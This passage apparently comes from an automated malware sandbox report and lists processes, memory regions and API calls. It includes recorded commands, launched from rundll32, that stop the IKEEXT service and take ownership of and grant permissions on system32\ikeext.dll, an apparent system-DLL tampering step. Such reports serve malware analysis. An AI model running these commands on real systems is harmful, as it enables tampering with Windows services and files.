wkscli.dll	0x73e70000	0x73e7efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netutils.dll	0x73e80000	0x73e88fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x740e0000	0x740e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x740f0000	0x7410bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x75290000	0x752a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x773e0000	0x773e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Process #9: net1.exe

(Host: 20, Network: 0)

Information	Value
ID	#9
File Name	c:\windows\system32\net1.exe
Command Line	C:\Windows\system32\net1 stop /y ikeext
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:47, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:28

OS Process Information

Information	Value
PID	0xb98
Parent PID	0xb90 (c:\windows\system32\net.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B9C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000f0000	0x000f0000	0x0016ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000170000	0x00170000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000390000	0x00390000	0x0039ffff	Private Memory	Readable, Writable	Region Actions Download Dump
net1.exe	0x00f10000	0x00f39fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netmsg.dll	0x6d0e0000	0x6d0e1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
browcli.dll	0x6d0f0000	0x6d0fcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdsapi.dll	0x6fce0000	0x6fcf7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
samcli.dll	0x734e0000	0x734eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
samlib.dll	0x73a10000	0x73a21fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wkscli.dll	0x73e70000	0x73e7efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netutils.dll	0x73e80000	0x73e88fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
netapi32.dll	0x73e90000	0x73ea0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dsrole.dll	0x741a0000	0x741a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
logoncli.dll	0x74cd0000	0x74cf1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x75290000	0x752a8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76960000	0x76994fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x773e0000	0x773e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd7000	0x7ffd7000	0x7ffd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xb9c

(Host: 20, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:34 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 80652	1	Fn
Module	Get Handle	module_name = c:\windows\system32\net1.exe, base_address = 0xf10000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\net1.exe, file_name_orig = C:\Windows\system32\net1.exe, size = 260	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Get Service Name	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Get Info	service_name = IKEEXT	1	Fn
Service	Get Display Name	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Module	Load	module_name = NETMSG, base_address = 0x6d0e0000	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 65	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 2	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 52	1	Fn Data
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_ERROR_HANDLE, size = 2	1	Fn Data

Process #10: cmd.exe

(Host: 58, Network: 0)

Information	Value
ID	#10
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c "takeown /F C:\Windows\system32\ikeext.dll"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:47, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:28

OS Process Information

Information	Value
PID	0xba0
Parent PID	0xb74 (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x BA4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00056fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000080000	0x00080000	0x00080fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00190000	0x001f6fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000310000	0x00310000	0x003d7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000440000	0x00440000	0x0044ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000450000	0x00450000	0x00550fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000560000	0x00560000	0x0115ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001160000	0x01160000	0x012c2fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x012d0000	0x0159efff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e50000	0x49e9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x721b0000	0x721b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xba4

(Host: 53, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:35 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 80730	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 192, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x765e2732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\takeown.exe, os_pid = 0xbb4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii, value = 0	1	Fn
Environment	Get Environment String		1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #12: cmd.exe

(Host: 58, Network: 0)

Information	Value
ID	#12
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c "icacls C:\Windows\system32\ikeext.dll /grant system:F"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:47, Reason: Child Process
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:28

OS Process Information

Information	Value
PID	0xbc0
Parent PID	0xb74 (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x BC4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00150000	0x001b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000001c0000	0x001c0000	0x001c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000001e0000	0x001e0000	0x001e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001f0000	0x001f0000	0x001fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000200000	0x00200000	0x00200fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000280000	0x00280000	0x0037ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000380000	0x00380000	0x00447fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000450000	0x00450000	0x00550fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000560000	0x00560000	0x0115ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001160000	0x01160000	0x012c2fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x012d0000	0x0159efff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49e50000	0x49e9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x721b0000	0x721b6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Threads

Thread 0xbc4

(Host: 53, Network: 0)

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2017-10-11 11:01:35 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 81104	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49e50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e24c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String		2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 224, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String		1	Fn Data
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x765cac6c	1	Fn
